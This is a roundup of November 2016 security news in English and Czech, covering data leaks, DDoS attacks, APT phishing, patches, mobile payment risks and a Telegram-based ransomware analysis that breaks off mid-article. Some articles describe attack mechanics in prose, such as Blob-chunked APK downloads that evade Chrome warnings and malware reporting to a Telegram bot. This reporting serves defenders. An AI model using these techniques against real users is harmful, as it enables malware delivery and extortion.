Capgemini inadvertently leaks data of recruitment firm Michael Page
18.11.2016 securityaffairs Crime

Job-related information belonging to hundreds of thousands of individuals in a Michael Page database was exposed online by Capgemini.
The firm Capgemini has inadvertently published a database of the Michael Page company, a company owned by PageGroup and specialized in recruiting.

The data leak has accidentally exposed job-related records of hundreds of thousands of individuals.

Michael Page has notified customers that their personal information was inadvertently exposed. Leaked records include names, email addresses, encrypted passwords, phone numbers and job-related information.

The France firm Capgemini provides IT services to Michael Page, its staff has accidentally exposed a Michael Page backup database containing roughly 30 Gb of SQL files.

The data leak was first reported by the popular security expert Troy Hunt who manages the breach notification website Troy Hunt received information of the Capgemini data breach in October from the same person who reported him the data leak that exposed records of the Australian Red Cross Blood Service (550,000 personal records exposed).

PageGroup and Capgemini determined that the backup was related to a testing environment for the PageGroup websites.

The archive includes 780,000 unique email addresses and job-related information.

“I’ll refer to Michael Page’s disclosure a little later on, but what I will say here is that there were over 780k unique email addresses in that one file and plenty of data relating to candidates’ jobs such as cover letters relating to their experience.” wrote Hunt.


PageGroup tried to downplay the incident saying that data is unlikely to be used for illegal purposes because only Hunt and the person who discovered the data leak accessed the information, and anyway both destroyed the database they had.

“We have ensured the website is secure. We are treating this issue very seriously and are working with our IT vendor, Capgemini as a matter of urgency to fully investigate how this incident occurred and to put in place measures to ensure it does not happen again,” reads the statement published by PageGroup. “Capgemini fully manage our PageGroup websites and is regarded as a global leader in consulting, technology and outsourcing services. It has all the appropriate security certificates and ISO certifications in place, which we believed would ensure that the website environments would be secure and safe in their hands.”

A Facebook glitch declared all its users are dead, including Zuckerberg
18.11.2016 securityaffairs Social

Facebook users who logged on to their accounts discovered that their accounts turned to a “memorialized account,” due to their alleged death.
Funny as it is disturbing, but the technology can also do this and this time it has happened to Facebook. This night the Tech giant declared everyone dead due to a glitch.

The memorial feature was implemented by Facebook in 2015 to allow families access their loved ones’ social accounts after the death.

This glitch was first discovered by the employees at the Business Insider.

“A Facebook bug is displaying people as having died when visiting their profile page.” reads the post published by the Business Insider.

“Multiple Business Insider employees reported seeing the message at the top of their Facebook profiles on Friday, and the bug appears to also be affecting Facebook CEO Mark Zuckerberg.”

On Friday afternoon, users who logged on to their accounts discovered that their accounts turned to a “memorialized account,” due to their alleged death.


Of course, the platform considered also the CEO Mark Zuckerberg as dead.

“We hope people who love Mark will find comfort in the things others share to remember and celebrate his life.” reads a statement on the Mark Zuckerberg’s profile.

Now imagine the impact on the visitors of the FB pages of their friends or popular individuals.

The colleagues at THN reached out to the company for an explanation:

“For a brief period today, a message meant for memorialized profiles was mistakenly posted to other accounts. This was a terrible error that we have now fixed. We are very sorry that this happened and we worked as quickly as possible to fix it.” a Facebook spokesperson told THN.

But Facebook is magic, and he has given us new life once it has solved the problem.

We resurrected!

Let’s remind that users can opt to have their account completely delete after their death or turn into a memorial page. The page allows friends and families to leave messages and share memories on their profile.

Díra v Chrome umožnila napadnout 318 000 zařízení
11.11.2016 Root
Prohlížeč Chrome v Androidu obsahuje vážnou zranitelnost, která je aktivně zneužívána k instalaci bankovního trojana. Zatím podlehlo více než 300 000 zařízení.
Bezpečnostní díra v prohlížeči Google Chrome pro Android umožňuje potichu na kartu stáhnout libovolnou aplikaci ve formátu .apk, tedy mimo oficiální obchod Google Play. Uživatel přitom nemusí nic potvrzovat, vše se stane potichu a automaticky. Chyba je už nyní v praxi zneužívána.

Někteří uživatelé v posledních dnech zaznamenali, že na jejich Androidu vyskočí dialog varující před zavirovaným zařízením. Doporučuje nainstalovat aplikaci, která virus sama odstraní.

Bohužel jde o útok, který zneužívá zranitelnosti v Google Chrome a pomocí upravené webové stránky zmanipuluje uživatele, aby zapnul možnost ruční instalace aplikací z .apk souborů. Pak rovnou do systému takovou aplikaci stáhne. Bez uživatelova potvrzení, bez jeho vědomí. Prohlížeč obvykle před stahováním souboru uživatele varuje a ptá se ho, jestli chce soubor na kartu uložit. V tomto případě je ale zneužita chyba v Chrome, která dovoluje soubor zapsat bez varování.

Jde o soubor last-browser-update.apk, který obsahuje bankovního trojana pojmenovaného Trojan-Banker.AndroidOS.Svpeng.q. Ten po úspěšném nainstalování požádá o správcovská práva, aby mohl blokovat antiviry v přístroji. Poté krade bankovní data a čísla karet, zobrazuje phishingové zprávy a vykrádá další data jako kontakty, zprávy či historii prohlížení.

Škodlivý kód je možné najít na běžných webech, protože se šíří prostřednictvím reklamní sítě Google AdSense. Tu používá celá řada webů, protože přes ni automaticky prodává reklamní prostor a za to získává finance na svůj provoz. V praxi tak může být „napadena“ prakticky libovolná stránka. Trojan se pak k uživateli začne stahovat, jakmile je načtena stránka s reklamou.

Od srpna bylo takto napadeno přes 318 000 zařízení s Androidem a mechanismus napadení popisují na blogu vývojáři společnosti Kasperski Labs, Mikhail Kuzin a Nikita Buchka. Postup spočívá v rozdělení stahovaného souboru na části a stažení pomocí funkce ve třídě Blob(). V takovém případě prohlížeč nekontroluje obsah souboru a dovolí jej uložit.

Uložený soubor může mít jedno z těchto jmen:

Jde o jména existujících regulérních aplikací a trojan pak uživateli vysvětlí, že je potřeba nainstalovat důležitou aktualizaci. Uživatel pak už jen potvrdí, že je možné balíček nainstalovat a problém je na světě.

Google o problému ví, odstranil napadené reklamy a tvrdí, že bude chybu záplatovat. Bohužel se nehovoří o konkrétním termínu, ale pokud vše půjde standardní cestou, dočkáme se další záplaty na začátku prosince, kdy po šesti týdnech vyjde nová aktualizace Chrome. Útočníci tedy budou mít ještě tři týdny čas a budou moci chybu dále zneužívat.

5 Major Russian Banks Hit With Powerful DDoS Attacks
11.11.2016 thehackernews Attack
Distributed Denial of Service (DDoS) attacks have risen enormously in past few months and, mostly, they are coming from hacked and insecure internet-connected devices, most commonly known as Internet of Things (IoT).
Recent DDoS attack against DNS provider Dyn that brought down a large chunk of the Internet came from hacked and vulnerable IoT devices such as DVRs, security cameras, and smart home appliances.
This DDoS was the biggest cyber attack the world has ever seen.
Now, in the latest incident, at least five Russian banks have been subject to a swathe of DDoS attacks for two days, said the Russian banking regulator.
The state-owned Sberbank was one of the five targets of the attacks that began on last Tuesday afternoon and lasted over the next two days.
According to Kaspersky Lab, the longest attack last for 12 hours and peaked at 660,000 requests per second came from a botnet of at least 24,000 hacked devices located in 30 countries.
Although the culprit appears to be using hacked and insecure IoT devices such as CCTV cameras or digital video recorders, Kaspersky Lab believes that the latest attack does not look like the work of the "Mirai IoT botnet" — the one used to disrupt the Dyn DNS service.
Mirai is a piece of nasty malware that scans for IoT devices that have weak factory default setting (hard-coded usernames and passwords), converts them into bots, and then used them to launch DDoS attack.
In a statement, Sberbank representative said the bank managed to neutralize the cyber attack without disturbing the ongoing operation of its website, adding that the latest DDoS attacks were among the largest the bank had ever seen, RT reports.
Another Russian bank, Alfabank, has also confirmed the DDoS attack, though it called the attack weak. The bank's representative told RIA Novosti that "there was an attack, but it was relatively weak. It did not affect Alfabank's business systems in any way."
Kaspersky said more than a half of the IoT botnet devices were situated in the United States, India, Taiwan, and Israel. To gain control over the devices, the hackers took advantage of smart devices that use easy to guess passwords.
Security researchers are continually pointing out serious threats from new connected devices that have been rushed to market with poor, or no, security implementations.
Just last week, the DDoS attack through hacked IoT devices led to the disruption of the heating systems for at least two apartments in the city of Lappeenranta, literally leaving their residents in subzero weather.
Keeping in mind the rise in the number of insecure IoT devices, it is entirely possible that the next round of attacks emerged from IoT-based botnet could reach orders of magnitude larger so much so that it could even take down our cities if we let it.
So the best way to protect your smart devices from being a part of DDoS botnet is to be more vigilant about the security of your internet-connected devices. Change the default settings and credentials of your devices and always protect your devices behind a firewall.
Although IoT manufacturers and Internet standard creators have a huge role to play in securing these vulnerable devices, consumers must also require taking some personal responsibility for safeguarding their own devices.

Warning: Beware of Post-Election Phishing Emails Targeting NGOs and Think Tanks
11.11.2016 thehackernews Spam
Just a few hours after Donald Trump won the 2016 US Presidential Election, a hacking group launched a wave of cyber attacks targeting U.S.-based policy think-tanks with a new spear phishing campaign designed to fool victims into installing malware.
The group of nation-state hackers, also known as Cozy Bear, APT29, and CozyDuke, is the one of those involved in the recent data breach of the Democratic National Committee (DNC) and is allegedly tied to the Russian government.
On Wednesday, the hackers sent a series of phishing emails to dozens of targets associated with non-governmental organizations (NGOs), policy think tanks in the US and even inside the US government, said security firm Volexity.
Phishing Attacks Powered by 'PowerDuke' Malware
The phishing emails were sent from purpose-built Gmail accounts and other compromised email accounts at Harvard University's Faculty of Arts and Sciences (FAS), trying to trick victims into opening tainted attachments containing malware and clicking on malicious links.
Once this was done, the phishing e-mail dropped a new variant of Backdoor malware, dubbed "PowerDuke," giving attackers remote access to the compromised systems.
PowerDuke is an extremely sophisticated piece of malware in both its way of infecting people as well as concealing its presence.
Besides making use of wide variety of approaches, PowerDuke uses steganography to hide its backdoor code in PNG files.
The firm spotted and reported at least five waves of phishing attacks targeting people who work for organizations, including Radio Free Europe/Radio Liberty, the RAND Corporation, the Atlantic Council, and the State Department, among others.
"Three of the five attack waves contained links to download files from domains that the attackers appear to have control over," the firm said in a blog post. "The other two attacks contained documents with malicious macros embedded within them. Each of these different attack waves was slightly different from one another."
Beware of Post-Election Themed Phishing Emails
All the phishing emails were election-themed. Why?
After Trump won the US presidential election, half of America, as well as people across the world, mourning the result was curious to know about the victory of Trump.
People even started searching on Google: How did Donald Trump win the US presidential election?, Were the election flawed? Why did Hillary Clinton lose?
Hackers took advantage of this curiosity to target victims, especially those who worked with the United States government and were much more concerned about Trump's victory.
Two of the emails claimed to have come from the Clinton Foundation giving insight of the elections, two others purported to be documents pertaining to the election's outcome being revised or rigged, and the last one offered a link to a PDF download on 'Why American Elections Are Flawed.'
The emails were sent using the real email address of a professor at Harvard, which indicates that the hackers likely hacked the professor's email and then used his account to send out the phishing emails.
The emails either contained malicious links to .ZIP files or included malicious Windows shortcut files linked to a "clean" Rich Text Format document and a PowerShell script.
Once clicked, the script installed PowerDuke on a victim's computer that could allow attackers to examine and control the target system. The malware has the capability to secretly download additional malicious files and evade detection from antivirus products.
Security firm CrowdStrike claimed in June 2016 that the hacking team Cozy Bear has previously hacked into networks belonging to the White House, State Department, and the United States Joint Chiefs of Staff.

For the first time massive DDoS attacks hit Russian banks in 2016
11.11.2016 securityaffairs Attack

A number of prolonged DDoS attacks hit at least five Russian banks this week and experts suspect the involvement of the Mirai Botnet once again.
A wave of DDoS attacks hit at least five Russian banks with prolonged DDoS attacks this week.

Among the victims of the DDoS attacks against the online banking services there are Sberbank and Alfabank banks.

The string of DDoS attacks began on Tuesday afternoon and lasted over two days.

“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.” reads
“The attack began Tuesday afternoon, and continued for two days straight, according to a source close to Russia’s Central Bank quoted by RIA Novosti. Sberbank confirmed the DDoS attack on its online services.”
“The attacks are conducted from botnets, consisting of tens of thousands computers, which are located in tens of countries,”Sberbank’s press service told RIA.

According to an unnamed Russian Central Bank, official the attackers used a botnet of IoT devices, likely a Mirai botnet. The Mirai botnet is the same threat that targeted the Dyn DNS service causing the Internet outage for a large portion of the US netizens.

ddoS attacks mirai

Both Sberbank and Alfabank have confirmed the DDoS attacks against their systems, but Alfabank downplayed the incident classifying the attack as a “weak” one.

“We registered a first attack early in the morning … the next attack in the evening involved several waves, each of them was twice as powerful as the previous one. Bank’s cybersecurity noticed and located the attack in time. There have been no problems in client online services,” Sberbank representative said.

“There was an attack, but it was relatively weak. It did not affect Alfabank’s business systems in any way,” the bank told RIA Novosti.

According to the experts from Kaspersky Lab, this is the first time that massive DDoS attacks hit Russian banks this year.

A previous string of DDoS attacks against banks was observed in October 2015.

Microsoft opravil desítky zranitelností, některé hackeři už zneužívají

11.11.2016 SecurityWorld Zranitelnosti
Chyby, z nich některé jsou dokonce kritické, se týkají systémů Windows, Office, Edge, Internet Exploreru či SQL Serveru.

Opravu chyb pokrývá 14 aktualizací zabezpečení, tzv. security bulletinů, z čehož jeden je věnovaný přímo Adobe Flash Playeru, který se od verzí Windows 8.1 a 10 aktualizuje skrze Windows Update. Šest bulletinů je hodnoceno jako kritických a osm jako důležitých.

Administrátoři by měli jako první aplikovat MS16-135, který popravuje zranitelnost nultého dne (zero day vulnerability); tu nyní zneužívá skupina hackerů v odborných kruzích známá jako Fancy Bear, APT28 nebo Strontium.

Zranitelnost označená jako CVE-2016-7255 byla veřejně odhalena Googlem již minulý týden, pouhých 10 dní potom, co o ní informoval firmu Microsoft. To způsobilo lehké tření ve vztahu obou společností.

Google dává prodejcům jen sedm dní na opravení chyb nebo alespoň snížení důsledků, pokud se dané zranitelnosti již zneužívají. Microsoft dlouhodobě s touto strategií nesouhlasí a domnívá se, že odhalení detailů o zranitelnosti vystavilo uživatele zvýšenému riziku.

Další z klíčových bulletinů je MS16-132, označený jako kritický. Opravuje několik chyb umožňujících spuštění kódu na vzdáleném systému (RCE) včetně další zranitelnosti nultého dne, kterou, dle Microsoftu, hackeři rovněž využívají.

Zranitelnost se nachází v knihovně fontů Windows a lze jí zneužít skrze speciálně vytvořené fonty, vložené do webových stránek nebo dokumentů. Úspěšné využití chyby umožňuje útočníkům převzít kompletní kontrolu nad systémem, varuje v bulletinu Microsoft.

Zbylé tři kritické bezpečnostní aktualizace jsou v Internet Exploreru a Edge, internetových prohlížečích firmy. Jde o bulletiny MS16-142 a MS16-129. Ačkoli detaily o chybách již unikly na veřejnosti, podle Microsoftu je zatím nikdo nezneužil.

Aktualizace zabezpečení mířená na Office balíček firmy, MS16-133, je označená jako důležitá; opět záplatuje možnosti spuštění kódu na vzdáleném systému. Zranitelnosti lze zneužít pomocí účelně vytvořených dokumentů.

„Protože Office dokumenty převládají ve firemním prostředí, myslím, že by [se adminitrátoři] měli k bulletinu chovat jako ke kritickému, i když je označen jen jako důležitý,“ říká Amol Sarwate, ředitel Vulnerability Labs firmy Qualys k analýze aktualizací.

Správci Microsoft SQL Serveru by zase měli upřednostnit MSL-136 bulletin, který zahrnuje záplaty na RDBMS engine, MDS API, SQL Analysis Services a SQL Server Agenta.

„Zranitelnosti SQL Serveru jsou poměrně vzácné, a ačkoli zde nehrozí útoky spuštěním kódu na vzdáleném systému, útočníci mohou získat zvýšená práva v systému, což jim může umožnit zobrazovat, měnit nebo mazat data či vytvářet nové účty,“ dodává Sarwate.

Facebook Buys Leaked Passwords From Black Market, But Do You Know Why?
11.11.2016 thehackernews Social
Facebook is reportedly buying stolen passwords that hackers are selling on the underground black market in an effort to keep its users' accounts safe.
On the one hand, we just came know that Yahoo did not inform its users of the recently disclosed major 2014 hacking incident that exposed half a billion user accounts even after being aware of the hack in 2014.
On the other hand, Facebook takes every single measure to protect its users' security even after the company managed to avoid any kind of security scandal, data breach or hacks that have recently affected top notch companies.
Speaking at the Web Summit 2016 technology conference in Portugal, Facebook CSO Alex Stamos said that over 1.3 Billion people use Facebook every day, and keeping them secure is building attack-proof software to keep out hackers, but keeping them safe is actually a huge task.
Stamos said there is a difference between 'security' and 'safety,' as he believes that his team can "build perfectly secure software and yet people can still get hurt."
Stamos was former Chief Information Security Officer at Yahoo who left the company in 2015 after discovering that its Chief Executive Marissa Mayer authorized the government surveillance program.
Stamos joined Facebook in summer 2015 and now leads the security team at the social network. He said that the biggest headache he deals there with is caused by passwords users keep securing their accounts.
"The reuse of passwords is the No. 1 cause of harm on the internet," said the security chief.
According to him, the username and password system that was initially introduced in the 1970’s will not help us now in 2016.
As CNET reports, when passwords are stolen in masses and traded on the black market, it becomes apparent just how many of users are choosing the weakest passwords, such as 12345 and password, to secure their online accounts, automatically making their account more vulnerable to being hacked.
And this issue is something the social network giant is keen to help its users avoid.
In an attempt to check that its users are not making use of these commonly used passwords for their Facebook accounts, Stamos disclosed that the company buys passwords from the black market and then cross-references them with encrypted passwords used on its site.
Stamos said that the social network then alerts tens of millions of users that their passwords needed changing as they were not strong enough to protect their accounts.
Facebook provides you a whole bunch of tools to tighten up the security of your account, including traditional two-factor authentication, identifying faces of friends, as well as machine learning algorithms to determine and inform whether activity on your account is fraudulent.
Users are always advised to enable Two-factor authentication, which is an effective measure to keep a tight hold on your account even after hackers have your credentials.
Another new measure tackles the issue of account recovery. So, even if hackers find their way into your email account that could allow them to seize your Facebook account easily by resetting your password, the social network allows you to let your close friends verify account recovery request on your behalf.

OpenSSL Project fixed the CVE-2016-7054 High severity DoS bug
11.11.2016 securityaffairs Vulnerebility

The OpenSSL Project has released the OpenSSL 1.1.0c update that addresses several vulnerabilities, including a high-severity DoS flaw (CVE-2016-7054).
The OpenSSL Project has released an update for the 1.1.0 branch (OpenSSL 1.1.0c) to fix a number of vulnerabilities. One of the issues solved with the update is the high severity denial-of-service (DoS) flaw CVE-2016-7054 that was reported by Robert Święcki from the Google Security Team.

The CVE-2016-7054 vulnerability is a heap-based buffer overflow related to TLS connections using *-CHACHA20-POLY1305 cipher suites.

“TLS connections using *-CHACHA20-POLY1305 ciphersuites are susceptible to a DoS attack by corrupting larger payloads. This can result in an OpenSSL crash. This issue is not considered to be exploitable beyond a DoS.” reads the advisory published

The flaw could be triggered corrupting larger payloads, a circumstance that leads to a DoS condition due to the crash of OpenSSL.

The OpenSSL Project confirmed the flaw does not affect versions prior to 1.1.0.

OpenSSL 2

The OpenSSL 1.1.0c also patches the following vulnerabilities:

a moderate severity flaw tracked as CVE-2016-7053, that affects the OpenSSL 1.1.0 and that can be triggered to cause applications.
a low severity flaw tracked as CVE-2016-7055 related to the Broadwell-specific Montgomery multiplication procedure that affects also the OpenSSL 1.0.2. The patch for OpenSSL 1.0.2 will be included in the next update.
I remind you that that version 1.0.1 version will no longer be supported after December 31, 2016.

“As per our previous announcements and our Release Strategy (, support for OpenSSL
version 1.0.1 will cease on 31st December 2016. No security updates for that
version will be provided after that date. Users of 1.0.1 are advised to
upgrade.” continues the advisory. Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.”

MalwareMustDie is closed for protest against the NSA
11.11.2016 securityaffairs Virus

The Legendary Blog of MalwareMustDie is closed for protest against NSA hacking trace of educational and public servers of harmless countries.
The Shadow Brokers, the hacker group that hacked NSA hackers, who have previously released NSA hacking tools for anyone to download, published more files containing the IP address of 49 countries that have been hacked by the US National Security Agency. Security experts on several media news are linking these nodes to the activity of Equation Group.

MalwareMustDie (MMD) group has started to focus the attention on the case, since Japan appeared to be the second most hacked country victims in the list, and was not listed as known target in the Equation Group (EQGRP) activities so far.

In the mean time, the result of the EQGRP hacking activity, based on malware used to infect Linux and Solaris platforms, has been reversed and published by CERT Antiy and with full details, except of the hashes that was not shared in their publishment.


Figure 1. The reverse of Linux and Solaris malware used by Equation Group

Researchers in the MalwareMustDie group has started to dig in the details and discovered that several accessible parts of the listed environments during the specific known period are having traces of unknown suspicious malicious codes and activities matched to the period and activity mentioned in several announced publicity. So far the group is currently avoiding public disclosure to what they found.

Following this investigation progress, a new awareness has raised giving the evidence that Universities/Schools, Internet Service Providers (ISP), Public Mail Service, Cable Television Network, a National NIC network, Entertainment network, Government Offices, and maybe more, has been in the risk of violated by the unauthorized access and malicious activity. Since the investigation was based on the list originated from the ShadowBroker’s post, the allegedly pointed attacker country’s spy entities are assumed responsible for the act.


Figure 2. Shadow Broker’s list of infected nodes in Japan with PITCHIMPAIR & INNOVATION

According to the usage of the platform, this investigated sad event’s fact may also in relation to what Der Spiegel has reported of the leaked NSA documentation in the past:


Figure 3. Der Spiegel’s published description of the hacking inquiries of NSA

The development of verdict that a friendly country was spotted to violate services of its allied countries, is a very sad pill to swallow, but the traces were there and that is the reality. Driving to the possibility of such level for mass offensive acts using hacking and malware activity would need the approval from the attacker’s operative authority and obviously the attacker’s government was also known and giving authorization for the act.

As the current conclusion of the investigation development, is started to be formed, consequentially, MalwareMustDie, as an entity against any usage of malicious software (malware) forms, that is known with their anti-malware research and analysis blog that since 4 long years produces research activity against malware, cybercrime and vandalism in Internet using malware, as a legitimate protest, was decided to close their analysis blog in, for an undefined period, leaving on their twitter profile the following statement:


Figure 4. The protest statement of MalwareMustDie against the NSA hacking

“For this reason, MMD blog is closed for an undefined period. USA related entities and researchers’ access to direct communication & research is prohibited under the same condition. Furthermore”, they continue, “we stop using any of US services or products for our research.”

The title of the Blog is clear, and the position of MalwareMustDie it’s clear as well: using malware is any activity with any kind of purpose, is just not accepted. “What is BAD stays BAD, no matter who you are. And if we can not do things strictly right, we can never stop “wrong” or “bad” things in the internet”. And it’s correct, because, really, malware must die.

DDoS útoků přibývá. Na vině je i laxnost uživatelů

10.11.2016 Novinky/Bezpečnost Počítačový útok
Útoky nejrůznějších botnetů – tedy sítí zotročených počítačů i mobilů – jsou stále častější. Za uplynulé čtvrtletí byly podle antivirové společnosti Kaspersky Lab napadeny tímto způsobem cíle v 67 zemích. Kyberzločincům přitom práci velmi usnadňuje i laxnost samotných uživatelů.
Co je DDoS

Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
Ve třetím kvartále byly botnetovými útoky napadeny cíle celkem v bezmála sedmi desítkách zemí. Zatímco v Japonsku, Spojených státech a Rusku počty útoků vzrostly, počty čínských a jihokorejských obětí naopak znatelně klesly.

Zajímavé je rozhodně i to, že ve zmiňovaném čtvrtletí se poprvé mezi prvními 10 zeměmi s nejvyšším počtem zaznamenaných DDoS útoků objevily tři západoevropské státy – Itálie, Francie a Německo.

Nejčastější jsou útoky na Čínu
Nejvíce DDoS útoků bylo nicméně ve sledovaném období cíleno na Čínu, i když ve srovnání s předchozím čtvrtletím jde o pokles. Konkrétně jen na populární čínský vyhledávač Baidu bylo vedeno dohromady 19 útoků, přičemž byl tento poskytovatel zároveň vystaven nejdéle trvajícímu útoku ve třetím čtvrtletí – rekordních 184 hodin.

K podobným útokům pomáhají nevědomky počítačovým pirátům také někteří uživatelé, které si příliš nelámou hlavu se zabezpečením svých zařízení. Je nutné podotknout, že řeč není pouze o chytrých telefonech a klasických počítačích, ale například také o tzv. zařízení internetu věcí (IoT) – tedy například nejrůznější kamery, které se mohou připojovat k internetu.

Právě tato zařízení se stala součástí obřího botnetu, který využili kyberzločinci na konci října na útok na DNS servery společnosti Dyn. Ty standardně překládají webové adresy na číselné adresy fyzických počítačů (IP adresy). Právě proto se podařilo hackerům vyřadit z provozu na východním pobřeží USA hned několik velkých webů – tím, že nefungoval překladač (DNS servery), webové prohlížeče po zadání adresy nevěděly, kam se mají připojit.

Uživatelé se tak nemohli připojit například na sociální sítě Twitter a Facebook, zpravodajské servery Daily News, CNN i New York Times a hudební portály Spotify a Soundcloud.

Uživatelé by měli dbát na zabezpečení
K útokům na koncové uživatele využívají počítačoví piráti velmi často různé viry, prostřednictvím kterých mohou napadenou stanici ovládat na dálku. Tu pak přiřadí do obřího botnetu, s jehož pomocí pak v případě dostatečné velikosti mohou vyřadit z provozu prakticky libovolný cíl na internetu.

Zabránit DDoS útokům tak mohou v první řadě samotní uživatelé, když budou klást dostatečný důraz na zabezpečení svých zařízení.

Loop of Confidence
10.11.2016 Kaspersky Crime
With the arrival of Apple Pay and Samsung Pay in Russia, many are wondering just how secure these payment systems are, and how popular they are likely to become. A number of experts have commented on this, basing their opinions on the common stereotypes of Android being insecure and the attacks which currently take place on wireless payments. In our opinion however, these technologies require a more detailed examination and a separate evaluation of the threats they face.

The conventional approach

Traditional threats associated with the use of bank cards in ATMs and physical stores have already been studied and described in sufficient detail:

the magnetic strip can be read using skimmers; modern versions of skimmers are advanced and very inconspicuous;
to read EMV chips, dedicated skimmers have been designed that are planted into payment terminals;
wireless payment systems (PayPass, PayWave) are potentially vulnerable to contactless, remote card reading attacks.
However, the growth in popularity of mobile devices has given rise to a new type of wireless mobile payment: a regular card payment can now be emulated using the smartphone’s built-in NFC antenna. The functionality is turned on at the request of the user, meaning there’s less risk than carrying around a card that’s constantly ready to make a payment. Bank clients, in turn, don’t have to take out their wallets when making a payment, and don’t even have to carry their bank cards around with them.

The technology for emulating cards on mobile devices (Host Card Emulation, HCE) may have been inexpensive and available to a broad range of device users starting from Android 4.4, but it had several drawbacks:

the payment terminal had to support wireless payments;
the eSE (embedded Secure Element) chip made the device more expensive, so initially it was incorporated into just a few top-of-the-range devices from major manufacturers;
if the manufacturer decided to cut costs on secure data storage, important information ended up being stored by the operating system which could be attacked by malware with root privileges on the device. However, this didn’t go beyond a few proof-of-concept attacks, because there are plenty of other easier ways of attacking mobile banking systems;
the developers attempted to mitigate the risks associated with storing important payment information on a mobile device, e.g. by using secure element in the cloud. This made smartphone-assisted payments unavailable in locations with unstable mobile services;
the risks associated with using software-based HCE storage made it highly advisable to introduce extra security measures into banking applications, making their development more complicated.
As a result, for many large banks, as well as users, paying with the help of card emulation using a smartphone is little more than a quirky feature used for promos or simply to show off in public.

New technologies

The problems described above have given rise to a number of studies, including some by large international companies, in search of more advanced technologies. The next step in the evolution of mobile payments was tokenized payment systems proposed by major market players – Apple, Samsung, and Google. Unlike card emulation on the device, these systems are based on exchanging tokens. A token is a unique transaction ID; the card details are never sent to the payment terminal. This addresses the problem of payment terminals being compromised by malware or skimmers. Unfortunately, this approach has the same problem: the technology has to be adopted and maintained by the manufacturer of the payment terminal.


Several years ago, a startup project called LoopPay attempted to address this problem. The developers proposed a kit consisting of a regular card reader for a 3.5 mm (1⁄8 in) audio jack and a phone case. Their know-how was a patented technology for emulating a bank card magnetic strip using a signal generated by their dedicated device. It has to be said that the creators took an early interest in secure data storage (on a dedicated device rather than on the phone) and protection from using the details of other people’s bank cards (personal data checked by comparing information about the user against information from the bank card’s Track 1 information). Later on, Samsung became interested in LoopPay and acquired the startup. After some time, the Magnetic Secure Transmission (MST) technology became available, complementing Samsung Pay tokenized payments. As a result, regular users can use their smartphones to make payments at payment terminals that support new wireless payment technologies and use MST at any type of terminal by just placing their device next to the magnetic strip reader.

We have been monitoring this project closely, and can now safely say that this technology is, on the whole, a big step forward in terms of convenience and security, because its developers have addressed lots of relevant risks:

secure element is used to reliably store data;
activation of payment mode on the phone requires the user to enter a PIN code or use a fingerprint;
on Samsung devices, a KNOX security solution and basic antivirus are pre-installed – these two block payment features when malware lands on the device;
KNOX Tamper Switch – an object of hate among forum-based “experts” – protects against more serious rootkit malware. KNOX Tamper Switch is a software and hardware appliance that irreversibly blocks the device’s business and payment features during any privilege escalation attacks;
payment functionality is only available from new devices for which security updates are available, and on which all vulnerabilities are quickly patched;
on some of the Samsung smartphones sold in Russia, Kaspersky Internet Security for Android is pre-installed. This provides extended protection from viruses and other mobile threats.
It should be noted that Samsung Pay, when making payments, uses a virtual card whose number is not available to the user, rather than the actual banking card tied to the user’s account. This method of payment works just fine when there is no Internet connection.

New old threats

There’s no doubt that the new technology has become an object of interest for security researchers. Potential attacks do exist for it and were presented at the latest BlackHat USA conference. These attacks may still only be potential threats, but we should still stay alert. Banks are just planning to introduce biometric authentication on ATMs in 2017, but cybercriminals are already collecting intelligence on which hardware manufacturers are involved, what sort of vulnerabilities exist in the hardware, etc. In other words, the technology is not even available to the wider public yet, but cybercriminals are already searching for weaknesses.

Cybercriminals are also studying Apple and Samsung’s technologies. To makes things worse for Russian users, these technologies only arrive in the Russian market a year after they are launched in Western countries.


Cybercriminals discussing the prospects of exploiting Apple Pay in Russia

At the same time, cybersecurity researchers tend to forget about conventional fraud, which mobile vendors are completely unprepared for as they enter a new sphere of business. Wireless payments have made card fraudsters’ lives much easier both in terms of online trade and shopping in regular stores. They no longer have to use a fake card with stolen card data recorded onto it, and thus run the risk of getting caught at the shop counter – now they can play it much safer by paying for merchandise with a stolen card attached to a top-of-the-range phone.

Alternatively, a fraudster can simply buy merchandise and gift cards in an Apple Store. In spite of all the security measures taken by Apple, the Apple Pay fraud rate in the US was 6% in 2015, or 60 times greater than the 0.1% bank card fraud.

Samsung Pay also sacrificed some of the useful anti-fraud features for usability after it purchased the startup; one being that accounts be rigidly attached to the cardholder’s name. For instance, I added my own bank card to my smartphone, and then added my colleague’s as well; in the original LoopPay solution, this was impossible.

To conclude, it’s now safe to say that the new tokenized solutions are indeed more secure and convenient compared to their predecessors. However, there’s still plenty of room for improvement when it comes to security, and that’s very important for the future prospects of the technology. After all, no one likes to lose money, be it banks or their clients.

The first cryptor to exploit Telegram
10.11.2016 Kaspersky Exploit
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.

What is a cryptor?

In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.

There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.

Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.

Analyzing the Telegram Trojan

The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).

Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.

In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.

The Trojan then sends a request to the URL<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.

